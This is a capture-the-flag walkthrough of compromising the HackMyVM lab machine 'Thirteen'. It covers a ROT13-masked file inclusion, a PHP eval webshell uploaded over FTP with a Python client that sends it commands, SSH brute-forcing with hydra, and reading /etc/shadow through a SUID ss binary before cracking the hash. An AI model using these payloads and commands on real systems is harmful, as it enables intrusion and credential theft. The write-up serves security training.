Thirteen

image

Target VM: https://hackmyvm.eu/machines/machine.php?vm=Thirteen

Target IP: 192.168.100.24

Information gathering

Port scan

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.24                                                       [12:24:32]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.24:21
Open 192.168.100.24:22
Open 192.168.100.24:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-20 12:24 CST
Initiating ARP Ping Scan at 12:24
Scanning 192.168.100.24 [1 port]
Completed ARP Ping Scan at 12:24, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:24
Completed Parallel DNS resolution of 1 host. at 12:24, 6.52s elapsed
DNS resolution of 1 IPs took 6.52s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 12:24
Scanning 192.168.100.24 [3 ports]
Discovered open port 21/tcp on 192.168.100.24
Discovered open port 22/tcp on 192.168.100.24
Discovered open port 80/tcp on 192.168.100.24
Completed SYN Stealth Scan at 12:24, 0.02s elapsed (3 total ports)
Nmap scan report for 192.168.100.24
Host is up, received arp-response (0.00046s latency).
Scanned at 2026-01-20 12:24:46 CST for 0s

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:14:13:3A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.71 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Three services: 21 is FTP, 22 is SSH and 80 is a web server. FTP and the web application are the interesting ones.

Directory scan of 80/tcp

root@LAPTOP-O235O5EH [/opt/tools] ➜  gobuster dir -u http://192.168.100.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip,bak,js,py,sh,swp
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.24
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: zip,js,py,sh,swp,php,html,txt,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 3444]
/welcome.txt (Status: 200) [Size: 180]
/config.txt (Status: 200) [Size: 378]
/readme.txt (Status: 200) [Size: 83]
/logs (Status: 301) [Size: 315] [--> http://192.168.100.24/logs/]
/server-status (Status: 403) [Size: 279]
Progress: 2205580 / 2205580 (100.00%)
===============================================================
Finished
===============================================================

The home page offers three functions

image

The parameter value in the URL is ROT13-encoded. ROT13 is a fixed, reversible letter substitution, not encryption and not access control, so any path can be encoded by hand and submitted.

image

Try reading /etc/passwd by submitting its ROT13 form:

/rgp/cnffjq

image

The file contents come back, so the parameter is a local file inclusion with nothing but a ROT13 layer in front of it.
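The following Python is an added example, not code from the writeup or from the target machine. It mirrors the behaviour observed above (decode ROT13, use the result as a path) beside a hardened resolver that maps the decoded value to an allow-list and confirms the final path stays inside the theme directory. The theme directory name and the allowed theme names are assumptions; nothing on the page shows the real application's layout.

```python
import codecs
import os
from typing import Optional

# Assumptions: the real application's theme directory and theme names are not
# shown on the page, so these are constructed for the example.
THEME_DIR = "/var/www/html/themes"
ALLOWED_THEMES = {"dark", "light"}


def rot13(s: str) -> str:
    """ROT13 is its own inverse, so one helper both encodes and decodes."""
    return codecs.encode(s, "rot_13")


def vulnerable_resolve(theme_param: str) -> str:
    """What the target does: decode the parameter and use it as a file path.
    ?theme=/rgp/cnffjq therefore includes /etc/passwd."""
    return rot13(theme_param)


def hardened_resolve(theme_param: str) -> Optional[str]:
    """Decode, require an allow-listed theme name, then check that the
    resolved path is still under THEME_DIR. Returns None when rejected."""
    name = rot13(theme_param)
    if name not in ALLOWED_THEMES:
        return None
    root = os.path.realpath(THEME_DIR)
    path = os.path.realpath(os.path.join(root, name + ".php"))
    # Defence in depth: even with an allow-list, refuse anything that
    # resolves outside the theme directory.
    if os.path.commonpath([root, path]) != root:
        return None
    return path


if __name__ == "__main__":
    print(rot13("/etc/passwd"))                 # /rgp/cnffjq
    print(vulnerable_resolve("/rgp/cnffjq"))    # /etc/passwd
    print(hardened_resolve("/rgp/cnffjq"))      # None
    print(hardened_resolve(rot13("dark")))      # .../themes/dark.php
```

The allow-list is what actually closes the hole; the realpath check only guards against a mistake in how the allow-listed name is joined to the directory.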

Scanning /logs

root@LAPTOP-O235O5EH [/opt/tools] ➜  gobuster dir -u http://192.168.100.24/logs -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip,bak,js,py,sh,swp,log
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.24/logs
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: zip,js,sh,swp,log,bak,py,php,html,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/ftp_server.log (Status: 200) [Size: 67428]
Progress: 2426138 / 2426138 (100.00%)
===============================================================
Finished
===============================================================

/logs/ftp_server.log

The log shows that ftp_server.py lives under /opt.

image

Reading it through the file inclusion (ROT13-encoded path) yields the FTP username and password.

image

Privilege escalation

www shell

Log in to FTP

root@LAPTOP-O235O5EH [/opt/tools] ➜  lftp 192.168.100.24 -u ADMIN                                            [13:41:50]
Password:
lftp ADMIN@192.168.100.24:~> ls
-rw-r--r-- 1 root root 1607 Jul 05 2025 ftp_server.py
-rw-r--r-- 1 root root 54 Jul 05 2025 rev.sh
lftp ADMIN@192.168.100.24:/> get ftp_server.py
1607 bytes transferred
lftp ADMIN@192.168.100.24:/> get rev.sh
54 bytes transferred
lftp ADMIN@192.168.100.24:/>

image

The ftp_server.py fetched over FTP is identical to /opt/ftp_server.py, so the FTP root directory is /opt and anything uploaded lands there, where the file inclusion can reach it.

So upload a webshell and trigger it through the file inclusion:

root@LAPTOP-O235O5EH [/opt/tools] ➜  cat webshell.php                                                        [13:53:26]
<?php @eval($_POST["cmd"])?>
root@LAPTOP-O235O5EH [/opt/tools] ➜ lftp 192.168.100.24 -u ADMIN [13:53:29]
Password:
lftp ADMIN@192.168.100.24:~> put webshell.php

http://192.168.100.24/?theme=/bcg/jrofuryy.cuc
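As an added example (not part of the writeup), the request that AntSword sends can be reproduced with the standard library: ROT13-encode the uploaded file's path for the theme parameter and POST PHP code in the cmd field that `@eval($_POST["cmd"])` executes. The target address, the /opt upload location and the parameter name are taken from the page; the PHP payload in `main` is an assumption.

```python
import codecs
import urllib.parse
import urllib.request

TARGET = "http://192.168.100.24"      # from the writeup
UPLOADED_SHELL = "/opt/webshell.php"  # FTP root is /opt, so `put webshell.php` lands here
PARAM = "cmd"                         # matches <?php @eval($_POST["cmd"])?>


def rot13(s: str) -> str:
    return codecs.encode(s, "rot_13")


def lfi_url(path: str, base: str = TARGET) -> str:
    """GET URL that makes the vulnerable theme parameter include `path`."""
    return f"{base}/?theme={urllib.parse.quote(rot13(path), safe='/')}"


def webshell_request(php: str, path: str = UPLOADED_SHELL,
                     base: str = TARGET) -> urllib.request.Request:
    """POST request carrying PHP code for the included webshell to eval()."""
    data = urllib.parse.urlencode({PARAM: php}).encode()
    return urllib.request.Request(lfi_url(path, base), data=data, method="POST")


def run(php: str, timeout: float = 10) -> str:
    """Send the request and return the response body (needs the target to be up)."""
    with urllib.request.urlopen(webshell_request(php), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Assumed payload; any PHP statement works because the shell uses eval().
    print(run("system('id');"))
```

Only `run` touches the network; the two builder functions can be checked offline, which is how the URL used above (/bcg/jrofuryy.cuc) is derived.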

Connection parameter for the webshell: cmd

Connect with AntSword (蚁剑)

image

Pop a reverse shell

image

www -> welcome

There is a hint file in /home/max

image

The hint says to generate a password list with cupp; recall that the welcome list on the web site contained user names, which serve as the input words.

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  cupp -w user.txt                                                    [16:19:07]
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]


*************************************************
* WARNING!!! *
* Using large wordlists in some *
* options bellow is NOT recommended! *
*************************************************

> Do you want to concatenate all words from wordlist? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to user.txt.cupp.txt, counting 313 words.
[+] Now load your pistolero with user.txt.cupp.txt and shoot! Good luck!
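The four prompts cupp asks in -w mode (concatenate words, append special characters, append numbers, leet) are the whole of what it does with an improvement list. The Python below is an added example, not cupp's code, that applies the same four mutations to a list of names so the shape of the resulting wordlist is visible; the suffix sets and the leet mapping are assumptions and the count will not match cupp's 313 words.

```python
from itertools import permutations
from typing import Iterable, List

# Assumed mutation tables; cupp ships its own, which are not reproduced here.
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5", "t": "7"})
SPECIALS = "!@#$%&*"
NUMBERS = ["1", "12", "123", "2024", "2025"]


def mutate(words: Iterable[str], concat: bool = False, specials: bool = False,
           numbers: bool = False, leet: bool = False) -> List[str]:
    """Expand a list of names the way cupp -w does with its four Y/N options."""
    stems = {w.strip() for w in words if w.strip()}
    if concat:
        # "concatenate all words": every ordered pair of distinct stems
        stems |= {a + b for a, b in permutations(sorted(stems), 2)}
    base = set()
    for w in stems:
        base |= {w.lower(), w.capitalize(), w.upper()}
    out = set(base)
    if specials:
        out |= {w + c for w in base for c in SPECIALS}
    if numbers:
        out |= {w + n for w in base for n in NUMBERS}
    if specials and numbers:
        out |= {w + n + c for w in base for n in NUMBERS for c in SPECIALS}
    if leet:
        out |= {w.translate(LEET) for w in list(out)}
    return sorted(out)


def write_wordlist(words: Iterable[str], path: str) -> int:
    """Write one candidate per line; returns the number written."""
    candidates = list(words)
    with open(path, "w") as f:
        f.write("\n".join(candidates) + "\n")
    return len(candidates)


if __name__ == "__main__":
    # Constructed input: the page's user names are not reproduced, so two
    # placeholder names stand in for the welcome list.
    names = ["max", "welcome"]
    wl = mutate(names, concat=True, specials=True, numbers=True, leet=True)
    print(write_wordlist(wl, "user.txt.cupp.txt"), "candidates")
```

Feed the file to hydra exactly as the writeup does; the only knob worth tuning first is the NUMBERS list, since a year or a short digit suffix is the most common thing people bolt onto a name.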

Brute-force the welcome user's SSH password with the generated list

hydra -l welcome -P user.txt.cupp.txt 192.168.100.24 ssh -t 4 -vV

image

welcome -> root

find / -perm -4000 -type f 2>/dev/null

One of the results is /usr/local/bin/supersuid.

Running it produces exactly the same output as ss.

image

Verify it:

image

Identical.
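Comparing output is a reasonable first check, but a renamed SUID binary is confirmed by comparing the file itself against the system's binaries. The Python below is an added example (not from the writeup) that lists SUID files and reports any file in the usual bin directories with the same size and SHA-256 as a suspect; `demo` runs it on constructed files because the target's binaries are not available here.

```python
import hashlib
import os
import stat
import tempfile
from typing import Iterable, List

SEARCH_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin",
               "/usr/local/bin", "/usr/local/sbin")


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_setuid(dirs: Iterable[str] = SEARCH_DIRS) -> List[str]:
    """Equivalent of `find <dirs> -perm -4000 -type f`, without following symlinks."""
    hits = []
    for d in dirs:
        for root, _, files in os.walk(d):
            for name in files:
                p = os.path.join(root, name)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    hits.append(p)
    return sorted(hits)


def find_twins(suspect: str, dirs: Iterable[str] = SEARCH_DIRS) -> List[str]:
    """Files under `dirs` that are byte-identical to `suspect` (size first, then hash)."""
    size = os.stat(suspect).st_size
    digest = sha256_of(suspect)
    twins = []
    for d in dirs:
        for root, _, files in os.walk(d):
            for name in files:
                p = os.path.join(root, name)
                if os.path.realpath(p) == os.path.realpath(suspect):
                    continue
                try:
                    if os.path.isfile(p) and os.path.getsize(p) == size \
                            and sha256_of(p) == digest:
                        twins.append(p)
                except OSError:
                    continue
    return sorted(twins)


def demo() -> bool:
    """Self-check on constructed files: a copy of 'ss' named 'supersuid'
    must be reported as its twin, and a file that differs must not."""
    with tempfile.TemporaryDirectory() as d:
        ss = os.path.join(d, "ss")
        sus = os.path.join(d, "supersuid")
        other = os.path.join(d, "other")
        data = b"\x7fELF constructed placeholder, not a real binary"
        for p, content in ((ss, data), (sus, data), (other, data + b"x")):
            with open(p, "wb") as f:
                f.write(content)
        return find_twins(sus, dirs=(d,)) == [ss]


if __name__ == "__main__":
    for p in find_setuid():
        print(p, find_twins(p))
```

On the target this is the one-liner `sha256sum /usr/local/bin/supersuid /usr/bin/ss`; the script version is for sweeping every SUID file at once, which is the question you actually have after `find / -perm -4000`.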

GTFOBins has a ready-made entry for ss: with the SUID bit it can read arbitrary files through its filter-file option.

https://gtfobins.github.io/gtfobins/ss/

supersuid -a -F /etc/shadow

Read /etc/shadow this way and crack the hash offline (the $6$ prefix is sha512crypt, hashcat mode 1800):

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  cat hash.txt                                                        [16:33:59]
$6$Cax26XI4SpAAItdE$7iVSsRoQT/o0b3.V9jMiljdau506ePGmZLkIl5JH9COngDqdXJkGnizRIhaLJu/JbwWZ.7XyF/MwzuDusZJcg1
root@LAPTOP-O235O5EH [~/Desktop/test] ➜ hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force -D 2 -w 3

image